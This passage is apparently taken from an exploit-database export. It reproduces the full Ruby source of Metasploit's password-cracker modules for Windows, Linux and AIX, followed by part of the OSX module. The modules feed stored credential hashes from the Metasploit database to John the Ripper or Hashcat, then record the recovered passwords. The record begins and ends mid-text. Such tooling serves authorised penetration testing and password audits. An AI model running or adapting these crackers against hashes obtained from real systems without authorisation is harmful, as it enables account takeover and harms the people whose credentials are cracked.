"https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/analyze/crack_databases.rb"}, {"lastseen": "2019-11-23T05:48:06", "bulletinFamily": "exploit", "description": "This module uses John the Ripper or Hashcat to identify weak passwords that have been acquired from Windows systems. The module will only crack LANMAN/NTLM hashes. LANMAN is format 3000 in hashcat. NTLM is format 1000 in hashcat.\n", "modified": "2019-10-09T00:31:23", "published": "2019-04-05T00:50:52", "id": "MSF:AUXILIARY/ANALYZE/CRACK_WINDOWS", "href": "", "type": "metasploit", "title": "Password Cracker: Windows", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/password_cracker'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::PasswordCracker\n include Msf::Exploit::Deprecated\n moved_from 'auxiliary/analyze/jtr_crack_fast'\n moved_from 'auxiliary/analyze/jtr_windows'\n\n def initialize\n super(\n 'Name' => 'Password Cracker: Windows',\n 'Description' => %Q{\n This module uses John the Ripper or Hashcat to identify weak passwords that have been\n acquired from Windows systems. The module will only crack LANMAN/NTLM hashes.\n LANMAN is format 3000 in hashcat.\n NTLM is format 1000 in hashcat.\n },\n 'Author' =>\n [\n 'theLightCosine',\n 'hdm',\n 'h00die' # hashcat integration\n ] ,\n 'License' => MSF_LICENSE, # JtR itself is GPLv2, but this wrapper is MSF (BSD)\n 'Actions' =>\n [\n ['john', {'Description' => 'Use John the Ripper'}],\n ['hashcat', {'Description' => 'Use Hashcat'}],\n ],\n 'DefaultAction' => 'john',\n )\n\n register_options(\n [\n OptBool.new('NTLM', [false, 'Crack NTLM hashes', true]),\n OptBool.new('LANMAN',[false, 'Crack LANMAN hashes', true]),\n OptBool.new('INCREMENTAL',[false, 'Run in incremental mode', true]),\n OptBool.new('WORDLIST',[false, 'Run in wordlist mode', true])\n ]\n )\n\n end\n\n def half_lm_regex\n # ^\\?{7} is ??????? which is JTR format, so password would be ???????D\n # ^[notfound] is hashcat format, so password would be [notfound]D\n /^[\\?{7}|\\[notfound\\]]/\n end\n\n def show_command(cracker_instance)\n return unless datastore['ShowCommand']\n if action.name == 'john'\n cmd = cracker_instance.john_crack_command\n elsif action.name == 'hashcat'\n cmd = cracker_instance.hashcat_crack_command\n end\n print_status(\" Cracking Command: #{cmd.join(' ')}\")\n end\n\n def print_results(tbl, cracked_hashes)\n cracked_hashes.each do |row|\n unless tbl.rows.include? row\n tbl << row\n end\n end\n tbl.to_s\n end\n\n def run\n def process_crack(results, hashes, cred, hash_type, method)\n return results if cred['core_id'].nil? # make sure we have good data\n # make sure we dont add the same one again\n if results.select {|r| r.first == cred['core_id']}.empty?\n results << [cred['core_id'], hash_type, cred['username'], cred['password'], method]\n end\n\n # however, a special case for LANMAN where it may come back as ???????D (jtr) or [notfound]D (hashcat)\n # we want to overwrite the one that was there *if* we have something better.\n results.map! { |r|\n r.first == cred['core_id'] &&\n r[3] =~ half_lm_regex ?\n [cred['core_id'], hash_type, cred['username'], cred['password'], method] : r\n }\n\n create_cracked_credential( username: cred['username'], password: cred['password'], core_id: cred['core_id'])\n results\n end\n\n def check_results(passwords, results, hash_type, hashes, method)\n passwords.each do |password_line|\n password_line.chomp!\n next if password_line.blank?\n fields = password_line.split(\":\")\n # If we don't have an expected minimum number of fields, this is probably not a hash line\n if action.name == 'john'\n next unless fields.count >=7\n cred = {}\n cred['username'] = fields.shift\n cred['core_id'] = fields.pop\n 2.times { fields.pop } # Get rid of extra :\n nt_hash = fields.pop\n lm_hash = fields.pop\n id = fields.pop\n password = fields.join(':') # Anything left must be the password. This accounts for passwords with semi-colons in it\n if hash_type == 'lm' && password.blank?\n if nt_hash == Metasploit::Credential::NTLMHash::BLANK_NT_HASH\n password = ''\n else\n next\n end\n end\n\n # password can be nil if the hash is broken (i.e., the NT and\n # LM sides don't actually match) or if john was only able to\n # crack one half of the LM hash. In the latter case, we'll\n # have a line like:\n # username:???????WORD:...:...:::\n cred['password'] = john_lm_upper_to_ntlm(password, nt_hash)\n next if cred['password'].nil?\n results = process_crack(results, hashes, cred, hash_type, method)\n elsif action.name == 'hashcat'\n next unless fields.count >= 2\n hash = fields.shift\n password = fields.join(':') # Anything left must be the password. This accounts for passwords with : in them\n next if hash.include?(\"Hashfile '\") && hash.include?(\"' on line \") # skip error lines\n hashes.each do |h|\n if hash_type == 'lm'\n next unless h['hash'].split(':')[0] == hash\n elsif hash_type == 'nt'\n next unless h['hash'].split(':')[1] == hash\n end\n cred = {'core_id' => h['id'],\n 'username' => h['un'],\n 'password' => password}\n results = process_crack(results, hashes, cred, hash_type, method)\n end\n end\n end\n results\n end\n\n tbl = Rex::Text::Table.new(\n 'Header' => 'Cracked Hashes',\n 'Indent' => 1,\n 'Columns' => ['DB ID', 'Hash Type', 'Username', 'Cracked Password', 'Method']\n )\n\n # array of hashes in jtr_format in the db, converted to an OR combined regex\n hashes_regex = []\n if datastore['LANMAN']\n hashes_regex << 'lm'\n end\n if datastore['NTLM']\n hashes_regex << 'nt'\n end\n\n # check we actually have an action to perform\n fail_with(Failure::BadConfig, 'Please enable at least one database type to crack') if hashes_regex.empty?\n\n # array of arrays for cracked passwords.\n # Inner array format: db_id, hash_type, username, password, method_of_crack\n results = []\n\n cracker = new_password_cracker\n cracker.cracker = action.name\n\n cracker_version = cracker.cracker_version\n if action.name == 'john' and not cracker_version.include?'jumbo'\n fail_with(Failure::BadConfig, 'John the Ripper JUMBO patch version required. See https://github.com/magnumripper/JohnTheRipper')\n end\n print_good(\"#{action.name} Version Detected: #{cracker_version}\")\n\n # create the hash file first, so if there aren't any hashes we can quit early\n # hashes is a reference list used by hashcat only\n cracker.hash_path, hashes = hash_file(hashes_regex)\n\n # generate our wordlist and close the file handle.\n wordlist = wordlist_file\n unless wordlist\n print_error('This module cannot run without a database connected. Use db_connect to connect to a database.')\n return\n end\n\n wordlist.close\n print_status \"Wordlist file written out to #{wordlist.path}\"\n\n cleanup_files = [cracker.hash_path, wordlist.path]\n\n hashes_regex.each do |format|\n # dupe our original cracker so we can safely change options between each run\n cracker_instance = cracker.dup\n cracker_instance.format = format\n if action.name == 'john'\n cracker_instance.fork = datastore['FORK']\n end\n\n # first check if anything has already been cracked so we don't report it incorrectly\n print_status \"Checking #{format} hashes already cracked...\"\n results = check_results(cracker_instance.each_cracked_password, results, format, hashes, 'Already Cracked/POT')\n vprint_good(print_results(tbl, results))\n\n if action.name == 'john'\n print_status \"Cracking #{format} hashes in single mode...\"\n cracker_instance.mode_single(wordlist.path)\n show_command cracker_instance\n cracker_instance.crack do |line|\n vprint_status line.chomp\n end\n results = check_results(cracker_instance.each_cracked_password, results, format, hashes, 'Single')\n vprint_good(print_results(tbl, results))\n\n print_status \"Cracking #{format} hashes in normal mode\"\n cracker_instance.mode_normal\n show_command cracker_instance\n cracker_instance.crack do |line|\n vprint_status line.chomp\n end\n results = check_results(cracker_instance.each_cracked_password, results, format, hashes, 'Normal')\n vprint_good(print_results(tbl, results))\n end\n\n if datastore['INCREMENTAL']\n print_status \"Cracking #{format} hashes in incremental mode...\"\n cracker_instance.mode_incremental\n show_command cracker_instance\n cracker_instance.crack do |line|\n vprint_status line.chomp\n end\n results = check_results(cracker_instance.each_cracked_password, results, format, hashes, 'Incremental')\n vprint_good(print_results(tbl, results))\n end\n\n if datastore['WORDLIST']\n print_status \"Cracking #{format} hashes in wordlist mode...\"\n cracker_instance.mode_wordlist(wordlist.path)\n # Turn on KoreLogic rules if the user asked for it\n if action.name == 'john' && datastore['KORELOGIC']\n cracker_instance.rules = 'KoreLogicRules'\n print_status \"Applying KoreLogic ruleset...\"\n end\n show_command cracker_instance\n cracker_instance.crack do |line|\n vprint_status line.chomp\n end\n\n results = check_results(cracker_instance.each_cracked_password, results, format, hashes, 'Wordlist')\n\n vprint_good(print_results(tbl, results))\n end\n\n #give a final print of results\n print_good(print_results(tbl, results))\n end\n if datastore['DeleteTempFiles']\n cleanup_files.each do |f|\n File.delete(f)\n end\n end\n end\n\n def hash_file(hashes_regex)\n hashes = []\n wrote_hash = false\n hashlist = Rex::Quickfile.new(\"hashes_tmp\")\n # Convert names from JtR to DB\n hashes_regex = hashes_regex.join('|')\n framework.db.creds(workspace: myworkspace, type: 'Metasploit::Credential::NTLMHash').each do |core|\n regex = Regexp.new hashes_regex\n next unless core.private.jtr_format =~ regex\n # only add hashes which havne't been cracked\n next unless already_cracked_pass(core.private.data).nil?\n if action.name == 'john'\n hashlist.puts hash_to_jtr(core)\n elsif action.name == 'hashcat'\n # hashcat hash files dont include the ID to reference back to so we build an array to reference\n hashes << {'hash' => core.private.data, 'un' => core.public.username, 'id' => core.id}\n hashlist.puts hash_to_hashcat(core)\n end\n wrote_hash = true\n end\n hashlist.close\n unless wrote_hash # check if we wrote anything and bail early if we didn't\n hashlist.delete\n fail_with Failure::NotFound, 'No applicable hashes in database to crack'\n end\n print_status \"Hashes Written out to #{hashlist.path}\"\n return hashlist.path, hashes\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/analyze/crack_windows.rb"}, {"lastseen": "2020-01-25T05:23:02", "bulletinFamily": "exploit", "description": "This module uses John the Ripper or Hashcat to identify weak passwords that have been acquired from unshadowed passwd files from Unix/Linux systems. The module will only crack MD5, BSDi and DES implementations by default. However, it can also crack Blowfish and SHA(256/512), but it is much slower.\n", "modified": "2019-10-09T00:31:23", "published": "2019-04-05T00:50:52", "id": "MSF:AUXILIARY/ANALYZE/CRACK_LINUX", "href": "", "type": "metasploit", "title": "Password Cracker: Linux", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/password_cracker'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::PasswordCracker\n include Msf::Exploit::Deprecated\n moved_from 'auxiliary/analyze/jtr_linux'\n\n def initialize\n super(\n 'Name' => 'Password Cracker: Linux',\n 'Description' => %Q{\n This module uses John the Ripper or Hashcat to identify weak passwords that have been\n acquired from unshadowed passwd files from Unix/Linux systems. The module will only crack\n MD5, BSDi and DES implementations by default. However, it can also crack\n Blowfish and SHA(256/512), but it is much slower.\n },\n 'Author' =>\n [\n 'theLightCosine',\n 'hdm',\n 'h00die' # hashcat integration\n ] ,\n 'License' => MSF_LICENSE, # JtR itself is GPLv2, but this wrapper is MSF (BSD)\n 'Actions' =>\n [\n ['john', {'Description' => 'Use John the Ripper'}],\n ['hashcat', {'Description' => 'Use Hashcat'}],\n ],\n 'DefaultAction' => 'john',\n )\n\n register_options(\n [\n OptBool.new('MD5',[false, 'Include MD5 hashes', true]),\n OptBool.new('DES',[false, 'Indlude DES hashes', true]),\n OptBool.new('BSDI',[false, 'Include BSDI hashes', true]),\n OptBool.new('BLOWFISH',[false, 'Include BLOWFISH hashes (Very Slow)', false]),\n OptBool.new('SHA256',[false, 'Include SHA256 hashes (Very Slow)', false]),\n OptBool.new('SHA512',[false, 'Include SHA512 hashes (Very Slow)', false]),\n OptBool.new('INCREMENTAL',[false, 'Run in incremental mode', true]),\n OptBool.new('WORDLIST',[false, 'Run in wordlist mode', true])\n ]\n )\n\n end\n\n def show_command(cracker_instance)\n return unless datastore['ShowCommand']\n if action.name == 'john'\n cmd = cracker_instance.john_crack_command\n elsif action.name == 'hashcat'\n cmd = cracker_instance.hashcat_crack_command\n end\n print_status(\" Cracking Command: #{cmd.join(' ')}\")\n end\n\n def print_results(tbl, cracked_hashes)\n cracked_hashes.each do |row|\n unless tbl.rows.include? row\n tbl << row\n end\n end\n tbl.to_s\n end\n\n def run\n def process_crack(results, hashes, cred, hash_type, method)\n return results if cred['core_id'].nil? # make sure we have good data\n # make sure we dont add the same one again\n if results.select {|r| r.first == cred['core_id']}.empty?\n results << [cred['core_id'], hash_type, cred['username'], cred['password'], method]\n end\n\n create_cracked_credential( username: cred['username'], password: cred['password'], core_id: cred['core_id'])\n results\n end\n\n def check_results(passwords, results, hash_type, hashes, method)\n passwords.each do |password_line|\n password_line.chomp!\n next if password_line.blank?\n fields = password_line.split(\":\")\n # If we don't have an expected minimum number of fields, this is probably not a hash line\n if action.name == 'john'\n next unless fields.count >=3\n cred = {}\n cred['username'] = fields.shift\n cred['core_id'] = fields.pop\n 4.times { fields.pop } # Get rid of extra :\n cred['password'] = fields.join(':') # Anything left must be the password. This accounts for passwords with semi-colons in it\n results = process_crack(results, hashes, cred, hash_type, method)\n elsif action.name == 'hashcat'\n next unless fields.count >= 2\n hash = fields.shift\n password = fields.join(':') # Anything left must be the password. This accounts for passwords with : in them\n next if hash.include?(\"Hashfile '\") && hash.include?(\"' on line \") # skip error lines\n hashes.each do |h|\n next unless h['hash'] == hash\n cred = {'core_id' => h['id'],\n 'username' => h['un'],\n 'password' => password}\n results = process_crack(results, hashes, cred, hash_type, method)\n end\n end\n end\n results\n end\n\n tbl = Rex::Text::Table.new(\n 'Header' => 'Cracked Hashes',\n 'Indent' => 1,\n 'Columns' => ['DB ID', 'Hash Type', 'Username', 'Cracked Password', 'Method']\n )\n\n # array of hashes in jtr_format in the db, converted to an OR combined regex\n hashes_regex = []\n hashes_regex << 'md5crypt' if datastore['MD5']\n hashes_regex << 'descrypt' if datastore['DES']\n hashes_regex << 'bsdicrypt' if datastore['BSDI']\n hashes_regex << 'bcrypt' if datastore['BLOWFISH']\n hashes_regex << 'sha256crypt' if datastore['SHA256']\n hashes_regex << 'sha512crypt' if datastore['SHA512']\n #if action.name == 'john'\n # # hashcat doesn't do generic crypt(3)\n # hashes_regex |= ['crypt', 'bcrypt'] if datastore['Crypt'] #blowfish is not within the 'crypt' family\n #elsif action.name == 'hashcat'\n #end\n\n # array of arrays for cracked passwords.\n # Inner array format: db_id, hash_type, username, password, method_of_crack\n results = []\n\n cracker = new_password_cracker\n cracker.cracker = action.name\n\n cracker_version = cracker.cracker_version\n if action.name == 'john' and not cracker_version.include?'jumbo'\n fail_with(Failure::BadConfig, 'John the Ripper JUMBO patch version required. See https://github.com/magnumripper/JohnTheRipper')\n end\n print_good(\"#{action.name} Version Detected: #{cracker_version}\")\n\n # create the hash file first, so if there aren't any hashes we can quit early\n # hashes is a reference list used by hashcat only\n cracker.hash_path, hashes = hash_file(hashes_regex)\n\n # generate our wordlist and close the file handle.\n wordlist = wordlist_file\n unless wordlist\n print_error('This module cannot run without a database connected. Use db_connect to connect to a database.')\n return\n end\n\n wordlist.close\n print_status \"Wordlist file written out to #{wordlist.path}\"\n\n cleanup_files = [cracker.hash_path, wordlist.path]\n\n hashes_regex.each do |format|\n # dupe our original cracker so we can safely change options between each run\n cracker_instance = cracker.dup\n cracker_instance.format = format\n\n if action.name == 'john'\n cracker_instance.fork = datastore['FORK']\n end\n\n # first check if anything has already been cracked so we don't report it incorrectly\n print_status \"Checking #{format} hashes already cracked...\"\n results = check_results(cracker_instance.each_cracked_password, results, format, hashes, 'Already Cracked/POT')\n vprint_good(print_results(tbl, results))\n\n if action.name == 'john'\n print_status \"Cracking #{format} hashes in single mode...\"\n cracker_instance.mode_single(wordlist.path)\n show_command cracker_instance\n cracker_instance.crack do |line|\n vprint_status line.chomp\n end\n results = check_results(cracker_instance.each_cracked_password, results, format, hashes, 'Single')\n vprint_good(print_results(tbl, results))\n\n print_status \"Cracking #{format} hashes in normal mode\"\n cracker_instance.mode_normal\n show_command cracker_instance\n cracker_instance.crack do |line|\n vprint_status line.chomp\n end\n results = check_results(cracker_instance.each_cracked_password, results, format, hashes, 'Normal')\n vprint_good(print_results(tbl, results))\n end\n\n if datastore['INCREMENTAL']\n print_status \"Cracking #{format} hashes in incremental mode...\"\n cracker_instance.mode_incremental\n show_command cracker_instance\n cracker_instance.crack do |line|\n vprint_status line.chomp\n end\n results = check_results(cracker_instance.each_cracked_password, results, format, hashes, 'Incremental')\n vprint_good(print_results(tbl, results))\n end\n\n if datastore['WORDLIST']\n print_status \"Cracking #{format} hashes in wordlist mode...\"\n cracker_instance.mode_wordlist(wordlist.path)\n # Turn on KoreLogic rules if the user asked for it\n if action.name == 'john' && datastore['KORELOGIC']\n cracker_instance.rules = 'KoreLogicRules'\n print_status \"Applying KoreLogic ruleset...\"\n end\n show_command cracker_instance\n cracker_instance.crack do |line|\n vprint_status line.chomp\n end\n\n results = check_results(cracker_instance.each_cracked_password, results, format, hashes, 'Wordlist')\n vprint_good(print_results(tbl, results))\n end\n\n #give a final print of results\n print_good(print_results(tbl, results))\n end\n if datastore['DeleteTempFiles']\n cleanup_files.each do |f|\n File.delete(f)\n end\n end\n end\n\n def hash_file(hashes_regex)\n hashes = []\n wrote_hash = false\n hashlist = Rex::Quickfile.new(\"hashes_tmp\")\n # Convert names from JtR to DB\n hashes_regex = hashes_regex.join('|')\\\n .gsub('md5crypt', 'md5')\\\n .gsub('descrypt', 'des')\\\n .gsub('bsdicrypt', 'bsdi')\\\n .gsub('sha256crypt', 'sha256')\\\n .gsub('sha512crypt', 'sha512')\\\n .gsub('bcrypt', 'bf')\n regex = Regexp.new hashes_regex\n framework.db.creds(workspace: myworkspace, type: 'Metasploit::Credential::NonreplayableHash').each do |core|\n next unless core.private.jtr_format =~ regex\n # only add hashes which havne't been cracked\n next unless already_cracked_pass(core.private.data).nil?\n if action.name == 'john'\n hashlist.puts hash_to_jtr(core)\n elsif action.name == 'hashcat'\n # hashcat hash files dont include the ID to reference back to so we build an array to reference\n hashes << {'hash' => core.private.data, 'un' => core.public.username, 'id' => core.id}\n hashlist.puts hash_to_hashcat(core)\n end\n wrote_hash = true\n end\n hashlist.close\n unless wrote_hash # check if we wrote anything and bail early if we didn't\n hashlist.delete\n fail_with Failure::NotFound, 'No applicable hashes in database to crack'\n end\n print_status \"Hashes Written out to #{hashlist.path}\"\n return hashlist.path, hashes\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/analyze/crack_linux.rb"}, {"lastseen": "2019-12-19T15:46:36", "bulletinFamily": "exploit", "description": "This module uses John the Ripper or Hashcat to identify weak passwords that have been acquired from passwd files on AIX systems. These utilize DES hashing. DES is format 1500 in Hashcat. DES is descrypt in JTR.\n", "modified": "2019-10-09T00:31:23", "published": "2019-04-05T00:50:52", "id": "MSF:AUXILIARY/ANALYZE/CRACK_AIX", "href": "", "type": "metasploit", "title": "Password Cracker: AIX", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/password_cracker'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::PasswordCracker\n include Msf::Exploit::Deprecated\n moved_from 'auxiliary/analyze/jtr_aix'\n\n\n def initialize\n super(\n 'Name' => 'Password Cracker: AIX',\n 'Description' => %Q{\n This module uses John the Ripper or Hashcat to identify weak passwords that have been\n acquired from passwd files on AIX systems. These utilize DES hashing.\n DES is format 1500 in Hashcat.\n DES is descrypt in JTR.\n },\n 'Author' =>\n [\n 'theLightCosine',\n 'hdm',\n 'h00die' # hashcat integration\n ] ,\n 'License' => MSF_LICENSE, # JtR itself is GPLv2, but this wrapper is MSF (BSD)\n 'Actions' =>\n [\n ['john', {'Description' => 'Use John the Ripper'}],\n ['hashcat', {'Description' => 'Use Hashcat'}],\n ],\n 'DefaultAction' => 'john',\n )\n\n register_options(\n [\n OptBool.new('INCREMENTAL',[false, 'Run in incremental mode', true]),\n OptBool.new('WORDLIST',[false, 'Run in wordlist mode', true])\n ]\n )\n end\n\n def show_command(cracker_instance)\n return unless datastore['ShowCommand']\n if action.name == 'john'\n cmd = cracker_instance.john_crack_command\n elsif action.name == 'hashcat'\n cmd = cracker_instance.hashcat_crack_command\n end\n print_status(\" Cracking Command: #{cmd.join(' ')}\")\n end\n\n def print_results(tbl, cracked_hashes)\n cracked_hashes.each do |row|\n unless tbl.rows.include? row\n tbl << row\n end\n end\n tbl.to_s\n end\n\n def run\n def process_crack(results, hashes, cred, hash_type, method)\n return results if cred['core_id'].nil? # make sure we have good data\n # make sure we dont add the same one again\n if results.select {|r| r.first == cred['core_id']}.empty?\n results << [cred['core_id'], hash_type, cred['username'], cred['password'], method]\n end\n\n create_cracked_credential( username: cred['username'], password: cred['password'], core_id: cred['core_id'])\n results\n end\n\n def check_results(passwords, results, hash_type, hashes, method)\n passwords.each do |password_line|\n password_line.chomp!\n next if password_line.blank?\n fields = password_line.split(\":\")\n # If we don't have an expected minimum number of fields, this is probably not a hash line\n if action.name == 'john'\n next unless fields.count >=3\n cred = {}\n cred['username'] = fields.shift\n cred['core_id'] = fields.pop\n 4.times { fields.pop } # Get rid of extra :\n cred['password'] = fields.join(':') # Anything left must be the password. This accounts for passwords with semi-colons in it\n results = process_crack(results, hashes, cred, hash_type, method)\n elsif action.name == 'hashcat'\n next unless fields.count >= 2\n hash = fields.shift\n password = fields.join(':') # Anything left must be the password. This accounts for passwords with : in them\n next if hash.include?(\"Hashfile '\") && hash.include?(\"' on line \") # skip error lines\n hashes.each do |h|\n next unless h['hash'] == hash\n cred = {'core_id' => h['id'],\n 'username' => h['un'],\n 'password' => password}\n results = process_crack(results, hashes, cred, hash_type, method)\n end\n end\n end\n results\n end\n\n tbl = Rex::Text::Table.new(\n 'Header' => 'Cracked Hashes',\n 'Indent' => 1,\n 'Columns' => ['DB ID', 'Hash Type', 'Username', 'Cracked Password', 'Method']\n )\n\n # array of hashes in jtr_format in the db, converted to an OR combined regex\n hashes_regex = ['descrypt']\n # array of arrays for cracked passwords.\n # Inner array format: db_id, hash_type, username, password, method_of_crack\n results = []\n\n cracker = new_password_cracker\n cracker.cracker = action.name\n\n cracker_version = cracker.cracker_version\n if action.name == 'john' and not cracker_version.include?'jumbo'\n fail_with(Failure::BadConfig, 'John the Ripper JUMBO patch version required. See https://github.com/magnumripper/JohnTheRipper')\n end\n print_good(\"#{action.name} Version Detected: #{cracker_version}\")\n\n # create the hash file first, so if there aren't any hashes we can quit early\n # hashes is a reference list used by hashcat only\n cracker.hash_path, hashes = hash_file(hashes_regex)\n\n # generate our wordlist and close the file handle. max length of DES is 8\n wordlist = wordlist_file(8)\n unless wordlist\n print_error('This module cannot run without a database connected. Use db_connect to connect to a database.')\n return\n end\n\n wordlist.close\n print_status \"Wordlist file written out to #{wordlist.path}\"\n\n cleanup_files = [cracker.hash_path, wordlist.path]\n\n hashes_regex.each do |format|\n # dupe our original cracker so we can safely change options between each run\n cracker_instance = cracker.dup\n cracker_instance.format = format\n\n if action.name == 'john'\n cracker_instance.fork = datastore['FORK']\n end\n\n # first check if anything has already been cracked so we don't report it incorrectly\n print_status \"Checking #{format} hashes already cracked...\"\n results = check_results(cracker_instance.each_cracked_password, results, format, hashes, 'Already Cracked/POT')\n vprint_good(print_results(tbl, results))\n\n if action.name == 'john'\n print_status \"Cracking #{format} hashes in single mode...\"\n cracker_instance.mode_single(wordlist.path)\n show_command cracker_instance\n cracker_instance.crack do |line|\n vprint_status line.chomp\n end\n results = check_results(cracker_instance.each_cracked_password, results, format, hashes, 'Single')\n vprint_good(print_results(tbl, results))\n\n print_status \"Cracking #{format} hashes in normal mode\"\n cracker_instance.mode_normal\n show_command cracker_instance\n cracker_instance.crack do |line|\n vprint_status line.chomp\n end\n results = check_results(cracker_instance.each_cracked_password, results, format, hashes, 'Normal')\n vprint_good(print_results(tbl, results))\n end\n\n if datastore['INCREMENTAL']\n print_status \"Cracking #{format} hashes in incremental mode...\"\n cracker_instance.mode_incremental\n show_command cracker_instance\n cracker_instance.crack do |line|\n vprint_status line.chomp\n end\n results = check_results(cracker_instance.each_cracked_password, results, format, hashes, 'Incremental')\n vprint_good(print_results(tbl, results))\n end\n\n if datastore['WORDLIST']\n print_status \"Cracking #{format} hashes in wordlist mode...\"\n cracker_instance.mode_wordlist(wordlist.path)\n # Turn on KoreLogic rules if the user asked for it\n if action.name == 'john' && datastore['KORELOGIC']\n cracker_instance.rules = 'KoreLogicRules'\n print_status \"Applying KoreLogic ruleset...\"\n end\n show_command cracker_instance\n cracker_instance.crack do |line|\n vprint_status line.chomp\n end\n\n results = check_results(cracker_instance.each_cracked_password, results, format, hashes, 'Wordlist')\n vprint_good(print_results(tbl, results))\n end\n\n #give a final print of results\n print_good(print_results(tbl, results))\n end\n\n if datastore['DeleteTempFiles']\n cleanup_files.each do |f|\n File.delete(f)\n end\n end\n end\n\n def hash_file(hashes_regex)\n hashes = []\n wrote_hash = false\n hashlist = Rex::Quickfile.new(\"hashes_tmp\")\n # descrypt is what JtR calls it, des is what we save it in the db as\n hashes_regex = hashes_regex.join('|').gsub('descrypt', 'des')\n regex = Regexp.new hashes_regex\n framework.db.creds(workspace: myworkspace, type: 'Metasploit::Credential::NonreplayableHash').each do |core|\n next unless core.private.jtr_format =~ regex\n # only add hashes which havne't been cracked\n next unless already_cracked_pass(core.private.data).nil?\n if action.name == 'john'\n hashlist.puts hash_to_jtr(core)\n elsif action.name == 'hashcat'\n # hashcat hash files dont include the ID to reference back to so we build an array to reference\n hashes << {'hash' => core.private.data, 'un' => core.public.username, 'id' => core.id}\n hashlist.puts hash_to_hashcat(core)\n end\n wrote_hash = true\n end\n hashlist.close\n unless wrote_hash # check if we wrote anything and bail early if we didn't\n hashlist.delete\n fail_with Failure::NotFound, 'No applicable hashes in database to crack'\n end\n print_status \"Hashes Written out to #{hashlist.path}\"\n return hashlist.path, hashes\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/analyze/crack_aix.rb"}, {"lastseen": "2019-12-29T00:33:46", "bulletinFamily": "exploit", "description": "This module uses John the Ripper or Hashcat to identify weak passwords that have been acquired from OSX systems. The module will only crack xsha from OSX 10.4-10.6, xsha512 from 10.7, and PBKDF2 from OSX 10.8+.\n", "modified": "2019-07-15T23:57:39", "published": "2019-04-05T00:50:52", "id": "MSF:AUXILIARY/ANALYZE/CRACK_OSX", "href": "", "type": "metasploit", "title": "Password Cracker: OSX", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/password_cracker'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::PasswordCracker\n\n def initialize\n super(\n 'Name' => 'Password Cracker: OSX',\n 'Description' => %Q{\n This module uses John the Ripper or Hashcat to identify weak passwords that have been\n acquired from OSX systems. The module will only crack xsha from OSX 10.4-10.6, xsha512\n from 10.7, and PBKDF2 from OSX 10.8+.\n },\n 'Author' =>\n [\n 'h00die' # hashcat integration\n ] ,\n 'License' => MSF_LICENSE, # JtR itself is GPLv2, but this wrapper is MSF (BSD)\n 'Actions' =>\n [\n ['john', {'Description' => 'Use John the Ripper'}],\n ['hashcat', {'Description' => 'Use Hashcat'}],\n ],\n 'DefaultAction' => 'john',\n )\n\n register_options(\n [\n OptBool.new('XSHA',[false, 'Include XSHA hashes from 10.4-10.6', true]),\n OptBool.new('XSHA512',[false, 'Include XSHA512 hashes from 10.7', true]),\n OptBool.new('PBKDF2',[false, 'Include PBKDF2-HMAC-SHA512 hashes from 10.8+', true]),\n OptBool.new('INCREMENTAL',[false, 'Run in incremental mode', true]),\n OptBool.new('WORDLIST',[false, 'Run in wordlist mode', true])\n ]\n )\n\n end\n\n def show_command(cracker_instance)\n return unless datastore['ShowCommand']\n if action.name == 'john'\n cmd = cracker_instance.john_crack_command\n elsif action.name == 'hashcat'\n cmd = cracker_instance.hashcat_crack_command\n end\n print_status(\" Cracking Command: #{cmd.join(' ')}\")\n end\n\n def print_results(tbl, cracked_hashes)\n cracked_hashes.each do |row|\n unless tbl.rows.include? row\n tbl << row\n end\n end\n tbl.to_s\n end\n\n def run\n def process_crack(results, hashes, cred, hash_type, method)\n return results if cred['core_id'].nil? # make sure we have good data\n # make sure we dont add the same one again\n if results.select {|r| r.first == cred['core_id']}.empty?\n results << [cred['core_id'], hash_type, cred['username'], cred['password'], method]\n end\n\n create_cracked_credential( username: cred['username'], password: cred['password'], core_id: cred['core_id'])\n results\n end\n\n def check_results(passwords, results, hash_type, hashes, method)\n passwords.each do |password_line|\n password_line.chomp!\n next if password_line.blank?\n fields = password_line.split(\":\")\n # If we don't have an expected minimum number of fields, this is probably not a hash line\n if action.name == 'john'\n next unless fields.count >=3\n cred = {}\n cred['username'] = fields.shift\n cred['core_id'] = fields.pop\n if hash_type == 'xsha512'\n 4.times { fields.pop } # Get rid of extra :\n end\n cred['password'] = fields.join(':') # Anything left must be the password. This accounts for passwords with semi-colons in it\n results = process_crack(results, hashes, cred, hash_type, method)\n elsif action.name == 'hashcat'\n next unless fields.count >= 2\n hash = fields.shift\n password = fields.join(':') # Anything left must be the password. This accounts for passwords with : in them\n next if hash.include?(\"Hashfile '\") && hash.include?(\"' on line \") # skip error lines\n hashes.each do |h|\n next unless h['hash'].upcase == hash.upcase\n cred = {'core_id' => h['id'], 'username' => h['un'], 'password' => password}\n results = process_crack(results, hashes, cred, hash_type, method)\n end\n end\n end\n results\n end\n\n tbl = Rex::Text::Table.new(\n 'Header' => 'Cracked Hashes',\n 'Indent' => 1,\n 'Columns' => ['DB ID', 'Hash Type', 'Username', 'Cracked Password', 'Method']\n )\n\n # array of hashes in jtr_format in the db, converted to an OR combined regex\n hashes_regex = []\n hashes_regex << 'xsha' if datastore['XSHA']\n hashes_regex << 'xsha512' if datastore['XSHA512']\n hashes_regex << 'PBKDF2-HMAC-SHA512' if datastore['PBKDF2']\n\n # array of arrays for cracked passwords.\n # Inner array format: db_id, hash_type, username, password, 